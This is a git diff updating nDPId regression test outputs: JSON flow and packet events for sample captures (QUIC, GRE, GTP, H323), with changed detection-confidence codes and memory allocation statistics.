+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"canary Chrome\/85.0.4169.0 Windows NT 10.0; Win64; x64"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":1350,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1591876186378} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879843 bytes -~~ total memory freed........: 5879843 bytes -~~ total allocations/frees...: 118135/118135 +~~ total memory allocated....: 6013477 bytes +~~ total memory freed........: 6013477 bytes +~~ total allocations/frees...: 120897/120897 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2272 chars diff --git a/test/results/gre_no_options.pcapng.out b/test/results/gre_no_options.pcapng.out index 99a3ed1f5..d275657c5 100644 --- a/test/results/gre_no_options.pcapng.out +++ b/test/results/gre_no_options.pcapng.out @@ -2,9 +2,9 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"gre_no_options.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1588346159187} 00551{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588346159187,"flow_last_seen":1588346159187,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1588346159187,"l3_proto":"ip4","src_ip":"203.0.113.1","dst_ip":"192.0.2.2","l4_proto":47,"flow_datalink":1,"flow_max_packets":3} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588346159187,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1588346159187,"pkt":"qrvMAAQAqrvMAAEACABFAAB8AAUAAP8vvUnLAHEBwAACAgAACABFAABkAAAAAP8Bo5QKAQIBCgECAggAttoAAAAAAAAAAAACx22rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavN"} -00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588346159187,"flow_last_seen":1588346159187,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1588346159187,"l3_proto":"ip4","src_ip":"203.0.113.1","dst_ip":"192.0.2.2","l4_proto":47,"ndpi": {"confidence": {"4":"DPI"},"proto":"GRE","breed":"Acceptable","category":"Network"}} +00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588346159187,"flow_last_seen":1588346159187,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1588346159187,"l3_proto":"ip4","src_ip":"203.0.113.1","dst_ip":"192.0.2.2","l4_proto":47,"ndpi": {"confidence": {"6":"DPI"},"proto":"GRE","breed":"Acceptable","category":"Network"}} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588346159188,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1588346159188,"pkt":"qrvMAAEAqrvMAAQACABFAAB8AAUAAP4vvknAAAICywBxAQAACABFAABkAAAAAP8Bo5QKAQICCgECAQAAvtoAAAAAAAAAAAACx22rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavN"} -00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588346159187,"flow_last_seen":1588346159188,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1588346159188,"l3_proto":"ip4","src_ip":"203.0.113.1","dst_ip":"192.0.2.2","l4_proto":47,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GRE","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"gre_no_options.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588346159187,"flow_last_seen":1588346159188,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1588346159188,"l3_proto":"ip4","src_ip":"203.0.113.1","dst_ip":"192.0.2.2","l4_proto":47,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GRE","breed":"Acceptable","category":"Network"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"gre_no_options.pcapng","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":208,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1588346159188} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869501 bytes -~~ total memory freed........: 5869501 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 653 chars diff --git a/test/results/gtp_c.pcap.out b/test/results/gtp_c.pcap.out index b446bfcdf..bdb5e1c50 100644 --- a/test/results/gtp_c.pcap.out +++ b/test/results/gtp_c.pcap.out @@ -2,10 +2,10 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"gtp_c.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614767558813} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614767558813,"flow_last_seen":1614767558813,"flow_idle_time":200000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1614767558813,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":1024,"dst_port":2123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614767558813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1614767558813,"pkt":"5kBKB+riApXG95NLCABFAAETmxkAAIARAAAKZQACCmYAAgQACEsA\/wAASCAA8wAAAABLVGIAAQAIAIlnRREiM0T1TAAGAJh2VBI0VksACAA0VniQEgEC81YADQAYmHZUEjSYdlQSNFZ4UwADAIlHVlIAAQAGTQACAAAAVwAJAIY1UpIECmUAAkcACQAIaW50ZXJuZXSAAAEAAGMAAQABTwAFAAEhFxcBfwABAAJIAAgAAAAnDwAAJw9JAAEABV0APQBJAAEABVQADQAhMQEJEMCoAQH\/\/\/8AVwAJAoQ1UpIFCmUAAlAAFgAYBwAAAAAAAAAAAAAAAAAAAAAAAAAAhAAHAAGsEGtxAAGEAAcBAawQa3IAAXIAAgAAAF8AAgAAAQ=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614767558813,"flow_last_seen":1614767558813,"flow_idle_time":200000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1614767558813,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":1024,"dst_port":2123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_C","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614767558813,"flow_last_seen":1614767558813,"flow_idle_time":200000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1614767558813,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":1024,"dst_port":2123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_C","breed":"Acceptable","category":"Network"}} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614767558814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1614767558814,"pkt":"ApXG95NL5kBKB+riCABFAADwmxEAAH8Rix0KZgACCmUAAghLBAAA3AAASCEA0DVSkgRLVGIAAgACABAAVwAJAYc1UpIGCmYAAk8ABQABIRcXAX8AAQABSAAIAAAAJw8AACcPXQBsAEkAAQAFAgACABAAVAAuACIgABgQ3NwAAP\/\/AAAwhEEH0BOIUQfQE4hwAAAQAA8whEEH0BOIUQfQE4hwAABXAAkChTVSkgcKZgACUAAWABgHAAAAAAAAAAAAAAAAAAAAAAAAAABeAAQAEDqYBQMAAQABiAAXAG9mY3MubW5jNjU0Lm1jYzk4Ny5ncHJzhAAHAAGsEGt6AAE="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614767558814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1614767558814,"pkt":"5kBKB+riApXG95NLCABFAAA+mxoAAIARAAAKZQACCmYAAgQACEsAKgAASCQAHjVSkgZLVGIASQABAAVWAA0AGJh2VBI0mHZUEjRWeA=="} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614767558813,"flow_last_seen":1614767558815,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1614767558815,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":1024,"dst_port":2123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_C","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"gtp_c.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614767558813,"flow_last_seen":1614767558815,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1614767558815,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":1024,"dst_port":2123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_C","breed":"Acceptable","category":"Network"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"gtp_c.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":516,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1614767558815} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869559 bytes -~~ total memory freed........: 5869559 bytes -~~ total allocations/frees...: 118118/118118 +~~ total memory allocated....: 6003193 bytes +~~ total memory freed........: 6003193 bytes +~~ total allocations/frees...: 120880/120880 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 773 chars diff --git a/test/results/gtp_false_positive.pcapng.out b/test/results/gtp_false_positive.pcapng.out index a7fd443f4..cb6a53d70 100644 --- a/test/results/gtp_false_positive.pcapng.out +++ b/test/results/gtp_false_positive.pcapng.out @@ -25,9 +25,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871766 bytes -~~ total memory freed........: 5871766 bytes -~~ total allocations/frees...: 118129/118129 +~~ total memory allocated....: 6005400 bytes +~~ total memory freed........: 6005400 bytes +~~ total allocations/frees...: 120891/120891 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 891 chars diff --git a/test/results/gtp_prime.pcapng.out b/test/results/gtp_prime.pcapng.out index eb2d1e71f..c794360b2 100644 --- a/test/results/gtp_prime.pcapng.out +++ b/test/results/gtp_prime.pcapng.out @@ -11,9 +11,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 193 chars ~~ json string max len.......: 672 chars diff --git a/test/results/h323-overflow.pcap.out b/test/results/h323-overflow.pcap.out index f7363f353..d68dd5480 100644 --- a/test/results/h323-overflow.pcap.out +++ b/test/results/h323-overflow.pcap.out @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871520 bytes -~~ total memory freed........: 5871520 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6005154 bytes +~~ total memory freed........: 6005154 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 654 chars diff --git a/test/results/h323.pcap.out b/test/results/h323.pcap.out index 57b0f1326..eb4008212 100644 --- a/test/results/h323.pcap.out +++ b/test/results/h323.pcap.out @@ -2,15 +2,15 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1198747079978} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747079978,"flow_last_seen":1198747079978,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1198747079978,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1198747079978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1198747079978,"pkt":"ABj+bZZlABMh8GpfCABFAABCx9cAAIART7MRAgB8EQIAoQfyBrcALv7LAiAAAAYACJFKAAQAEQIAfAfyIgCuAQA9AAEDAIXImlEggAMBQAA="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747079978,"flow_last_seen":1198747079978,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1198747079978,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747079978,"flow_last_seen":1198747079978,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1198747079978,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1198747080010,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":125,"pkt_l4_len":91,"thread_ts_msec":1198747080010,"pkt":"ABMh8GpfABj+bZZlCABFAABviRAAAIARjk0RAgChEQIAfAa3B\/IAWwaKBIAAAAYACJFKAAQ+AE8AcABlAG4ASAAzADIAMwAgAEcAYQB0AGUAawBlAGUAcABlAHIAIABvAG4AIABtAGYAbwB0AHQAZQBrAGkAbgARAgChBrc="} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1198747080226,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1198747080226,"pkt":"ABj+bZZlABMh8GpfCABFAACgx94AAIART04RAgB8EQIAoQfyBrcAjI1fDsAAAQYACJFKAASAAQARAgB8BrgBABECAHwH8iIArgEAPQABhA4QA0AzMzMzMzMzMzCZkD4ATwBwAGUAbgBIADMAMgAzACAARwBhAHQAZQBrAGUAZQBwAGUAcgAgAG8AbgAgAG0AZgBvAHQAdABlAGsAaQBuAK4BAD0oCwAAAQABgAGA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747081344,"flow_last_seen":1198747081344,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1198747081344,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1198747081344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1198747081344,"pkt":"ABMh8GmQABMh8GpfCABFAADByARAAIAGDzkRAgB8EQIAegvYBrgNUNrQGPo2h1AY\/\/8jrQAAAwAAmQgCAAEFBAOQkKJsCME1Mjk1NjcycAjBOTI0NjUyNn4AcwUgqAYACJFKAAQBAwCFyJpSIK4BAD0AEQIAega4AAA9\/TAAAEgzgAAFBAMCAQAAzQ2AAgcAEQIAfAa4EQAAQJH7con5EYAqBQQDAgEAAQABAAEAAQAZAXggFAARaW5mb0Bhc2Vsc2FuLmNvbW9tKBCAAQCh"} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1198747081402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1198747081402,"pkt":"ABMh8GpfABMh8GmQCABFAABWwtdAAIAGFNERAgB6EQIAfAa4C9gY+jaHDVDbaVAY\/2aqggAAAwAALggCgAFafgAiBSXABgAIkUoABFgIEQAkqxVydvoYEJpYABMh8GmQAoABAA=="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747081402,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1198747079978,"flow_last_seen":1198747160184,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":369,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 